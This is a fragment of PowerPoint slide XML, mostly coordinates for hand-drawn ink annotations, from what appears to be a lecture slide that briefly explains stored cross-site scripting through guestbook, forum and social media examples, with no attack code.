                <a:ext cx="117000" cy="112680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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54646" y="4440914"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2879926" y="4456394"/>
                <a:ext cx="66240" cy="122400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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71286" y="4447394"/>
                  <a:ext cx="83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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2957686" y="4486994"/>
                <a:ext cx="81720" cy="72360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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48686" y="4478354"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3014926" y="4475834"/>
                <a:ext cx="60480" cy="214560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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06286" y="4466834"/>
                  <a:ext cx="78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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3147766" y="4351994"/>
                <a:ext cx="62280" cy="198360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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38766" y="4342994"/>
                  <a:ext cx="79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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3229126" y="4448114"/>
                <a:ext cx="97200" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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20126" y="4439474"/>
                  <a:ext cx="114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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3364846" y="4448474"/>
                <a:ext cx="89640" cy="77760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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56206" y="4439474"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3473206" y="4437314"/>
                <a:ext cx="27720" cy="88560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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64206" y="4428674"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3558886" y="4434794"/>
                <a:ext cx="90720" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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49886" y="4425794"/>
                  <a:ext cx="108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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3648166" y="4356314"/>
                <a:ext cx="35280" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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39166" y="4347314"/>
                  <a:ext cx="52920" cy="17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55" name="Gewitterblitz 1154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D101A79-6171-4747-A541-8749CBC47EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266971" y="3783374"/>
            <a:ext cx="365778" cy="40932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44585827-E702-499F-81A4-D718C85B1C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523230" y="4352203"/>
            <a:ext cx="64934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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>persistent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is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stored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in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application</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="20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guestbook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forum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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>social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media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 etc.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victim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receives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viewing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content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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" sz="20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BE4D945D-A314-4612-A05A-44AAA74BDDCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="848371" y="2583674"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="1233360"/>
          </a:xfrm>
        </p:grpSpPr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A0874B14-E556-460B-AEAB-F76ED6A74C10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7B6927FF-ED13-48DD-9171-855D6A07B804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55815444-E735-40C9-A22F-9BA30BC11127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ECD47834-C5B1-4950-988A-33716ABD6EB3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B5CC934A-9904-4FAE-BBEC-0015F97566A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24B237A2-1572-4B95-A4D8-1D4ECF4172DB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DBDF2950-C1B7-42C3-B33B-AFDD62F171F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1D6D303B-4AF1-45CE-BDB4-571BA75413A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1E3B633C-7213-4708-BA34-4D1F2FD3CA76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E00609DC-1DE1-4F73-8D4B-EB9EEEBA7CF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817B0205-8D5E-4892-BA91-377E6375D4E5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225681E5-CD59-48B6-99A3-1342E9B6EB72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247E2046-CC25-467F-BC66-94C27588933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96C8C2A7-CA42-4D3B-8388-A39DBFFF4314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463AE410-9646-4E6B-8270-5D70B168448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CB08D9F8-A467-4877-87A8-9664BF27F7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4B953EA2-A285-411A-9645-4EE52F58CAD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C474798A-9446-44E8-8C22-8F9233D044C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C3E0263B-E8E9-4273-98ED-EA42064B4CA6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1CE5BB0B-8A1F-40F1-9363-64F93201D3DD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A07EC04F-1481-4B72-8185-FD21721FBAE3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51" name="Freihand 150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFD7C2A-CF2C-47AF-9D9D-C5276FD5A13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B0E1AB4B-8BF3-4AF6-9FA4-49A699EB5922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3" name="Gruppieren 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4140AB2-1CC1-4F66-A916-0CC6A4254CF5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BB95D13D-8484-4A25-9D1F-B2E4C6FB1463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352697D-FABD-4CEF-8E82-5B533C6089D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5EABC6B8-42FE-4F9E-8513-6B3BD5BCCD5E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39E11A2E-6A94-464E-B80B-DCA16054B0AB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B52A3271-1BC3-49A2-B469-9706E741ABB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5156706" y="2873474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3" name="Freihand 172">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B719D7-CF40-4422-BA9C-5F7A4F65C576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85E5C6FD-77FF-4414-8D56-B7A8EEBEEEC7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F5438D72-0F21-4D86-9F4E-545DED2C1E3E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6" name="Gruppieren 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95A4FE3-052F-4BB4-ABFA-B84C41AC3533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177" name="Freihand 176">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88CC3D67-FA9A-40C7-98E8-7A3F4339BA08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30930D41-C8C4-4746-BFE6-D2C4E8EF91AD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3A0ACD4B-EC83-4407-82EB-C23F5F0A8F77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539AC352-87A4-4429-98A5-3AABF9FB2332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08D0FA2A-ED5B-4E3C-8BF9-6229C9EC55CA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30C6172A-6398-4978-8AB3-08B860CBD8CA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D51EFC3E-5915-413D-98D1-AF00B94137D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641A6708-5CBA-4616-8AF8-C8079F1F9ECC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25D636D4-F3D1-4608-93E8-D728C36C1E20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F5A1B77C-0892-4037-AF1F-65E7A2A28968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1BC3EBE8-1684-4101-AC0E-168898A90C91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8355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6C639-4E4E-4141-AF0F-7A4C0A5F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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1039" name="Gruppieren 1038">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05965994-66C4-4C20-A1DB-ACC1EF70C7B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9404141" y="1608127"/>
            <a:ext cx="1824994" cy="1001160"/>
            <a:chOff x="1165452" y="1554434"/>
            <a:chExt cx="1824994" cy="1001160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28CCE68-BEA7-4907-9E7D-EF8CB5D4E3E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2604526" y="1554434"/>
              <a:ext cx="385920" cy="374040"/>
              <a:chOff x="2604526" y="1554434"/>
              <a:chExt cx="385920" cy="37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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2634406" y="1674314"/>
                  <a:ext cx="262440" cy="254160"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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25406" y="1665314"/>
                    <a:ext cx="28008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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2724766" y="1755314"/>
                  <a:ext cx="8280" cy="6840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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716126" y="1746314"/>
                    <a:ext cx="2592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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2798566" y="1763954"/>
                  <a:ext cx="19800" cy="29520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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89566" y="1754954"/>
                    <a:ext cx="3744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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2740246" y="1809674"/>
                  <a:ext cx="15840" cy="39600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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31606" y="180103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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2674366" y="1870874"/>
                  <a:ext cx="74160" cy="183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665366" y="1861874"/>
                    <a:ext cx="918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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2604526" y="1646594"/>
                  <a:ext cx="385920" cy="54720"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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595886" y="1637594"/>
                    <a:ext cx="40356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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2697766" y="1554434"/>
                  <a:ext cx="214200" cy="12456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688766" y="1545794"/>
                    <a:ext cx="231840" cy="142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6" name="Gruppieren 1025">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1D42FA-146B-4B07-A516-565CCA46E322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2532166" y="1942874"/>
              <a:ext cx="371520" cy="612720"/>
              <a:chOff x="2532166" y="1942874"/>
              <a:chExt cx="371520" cy="61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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2643406" y="1942874"/>
                  <a:ext cx="75240" cy="47592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634406" y="1933874"/>
                    <a:ext cx="92880" cy="49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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2532166" y="2379194"/>
                  <a:ext cx="131040" cy="176400"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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523166" y="2370554"/>
                    <a:ext cx="14868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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2670406" y="2394674"/>
                  <a:ext cx="162000" cy="147240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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661766" y="2385674"/>
                    <a:ext cx="1796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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2554126" y="2089034"/>
                  <a:ext cx="120600" cy="114480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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545126" y="2080394"/>
                    <a:ext cx="13824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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2709286" y="2049794"/>
                  <a:ext cx="194400" cy="15408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700286" y="2040794"/>
                    <a:ext cx="21204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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2043740" y="1917214"/>
                <a:ext cx="392040" cy="276120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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34740" y="1908574"/>
                  <a:ext cx="409680" cy="293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38" name="Gruppieren 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372EC0FC-DC80-4021-8178-1503278097E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1165452" y="1818119"/>
              <a:ext cx="756360" cy="493560"/>
              <a:chOff x="1002886" y="1786634"/>
              <a:chExt cx="75636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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1002886" y="1786634"/>
                  <a:ext cx="67320" cy="483840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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93886" y="1777994"/>
                    <a:ext cx="84960" cy="50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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1037086" y="1794554"/>
                  <a:ext cx="567000" cy="39960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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028086" y="1785554"/>
                    <a:ext cx="58464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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1029526" y="2200274"/>
                  <a:ext cx="723600" cy="79920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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020886" y="2191634"/>
                    <a:ext cx="74124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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1580326" y="1794554"/>
                  <a:ext cx="178920" cy="408600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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71686" y="1785554"/>
                    <a:ext cx="196560" cy="42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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1122766" y="1883834"/>
                  <a:ext cx="70560" cy="74520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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113766" y="1875194"/>
                    <a:ext cx="8820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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1235806" y="1897154"/>
                  <a:ext cx="92880" cy="55440"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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227166" y="1888154"/>
                    <a:ext cx="11052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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1363246" y="1887794"/>
                  <a:ext cx="306720" cy="85680"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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354246" y="1879154"/>
                    <a:ext cx="32436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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1378726" y="1885994"/>
                  <a:ext cx="291600" cy="51480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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369726" y="1876994"/>
                    <a:ext cx="309240" cy="69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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7566640" y="1741758"/>
              <a:ext cx="1633680" cy="185400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p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557640" y="1732775"/>
                <a:ext cx="1651320" cy="203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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7554040" y="1759038"/>
              <a:ext cx="213840" cy="232560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p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545055" y="1750038"/>
                <a:ext cx="23145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BB1654B-EB5B-4F60-8E83-1BAC18D5E629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="176866">
            <a:off x="7721800" y="1338558"/>
            <a:ext cx="1788480" cy="311400"/>
            <a:chOff x="7364446" y="2557754"/>
            <a:chExt cx="17884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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7364446" y="2699594"/>
                <a:ext cx="31320" cy="140040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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55446" y="2690594"/>
                  <a:ext cx="48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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7445806" y="2734514"/>
                <a:ext cx="82080" cy="88200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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437166" y="2725874"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7488286" y="2730194"/>
                <a:ext cx="129960" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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79286" y="2721194"/>
                  <a:ext cx="147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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7577566" y="2658194"/>
                <a:ext cx="8280" cy="18360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68926" y="2649554"/>
                  <a:ext cx="25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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7634806" y="2704994"/>
                <a:ext cx="133560" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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25806" y="2696354"/>
                  <a:ext cx="151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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7778086" y="2699954"/>
                <a:ext cx="133920" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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69086" y="2690954"/>
                  <a:ext cx="151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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7950166" y="2577554"/>
                <a:ext cx="7200" cy="186120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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41166" y="2568914"/>
                  <a:ext cx="24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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7868806" y="2655674"/>
                <a:ext cx="136080" cy="11880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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59806" y="2646674"/>
                  <a:ext cx="153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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8125126" y="2661074"/>
                <a:ext cx="121680" cy="169920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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16126" y="2652434"/>
                  <a:ext cx="139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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8295046" y="2679434"/>
                <a:ext cx="73800" cy="5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86406" y="2670434"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8361286" y="2671874"/>
                <a:ext cx="23760" cy="727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52646" y="2663234"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8435086" y="2669354"/>
                <a:ext cx="78120" cy="493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26086" y="2660714"/>
                  <a:ext cx="95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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8431126" y="2652074"/>
                <a:ext cx="128520" cy="1551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22486" y="2643434"/>
                  <a:ext cx="146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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8609686" y="2580074"/>
                <a:ext cx="70200" cy="1569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00686" y="2571074"/>
                  <a:ext cx="87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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8667646" y="2678354"/>
                <a:ext cx="101160" cy="6048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59006" y="2669714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8803366" y="2672954"/>
                <a:ext cx="97920" cy="8028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94726" y="2664314"/>
                  <a:ext cx="115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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8927566" y="2686634"/>
                <a:ext cx="11520" cy="7488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918926" y="2677634"/>
                  <a:ext cx="29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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8953846" y="2673674"/>
                <a:ext cx="127080" cy="7704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45206" y="2665034"/>
                  <a:ext cx="144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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9109726" y="2557754"/>
                <a:ext cx="43200" cy="17820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101086" y="2548754"/>
                  <a:ext cx="608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BA5B70B-C698-45F4-9C76-AB4D89C347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7438480" y="1465638"/>
            <a:ext cx="171000" cy="128880"/>
            <a:chOff x="7081126" y="2684834"/>
            <a:chExt cx="17100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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7081126" y="2684834"/>
                <a:ext cx="105120" cy="1267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72486" y="2675834"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7245286" y="2800754"/>
                <a:ext cx="6840" cy="1296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236286" y="2792114"/>
                  <a:ext cx="244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4" name="Gruppieren 1073">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C573F4E-EF79-4D61-8FC6-13F9F5B4B4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3384286" y="1231998"/>
            <a:ext cx="1951560" cy="692280"/>
            <a:chOff x="3384286" y="2451194"/>
            <a:chExt cx="195156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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
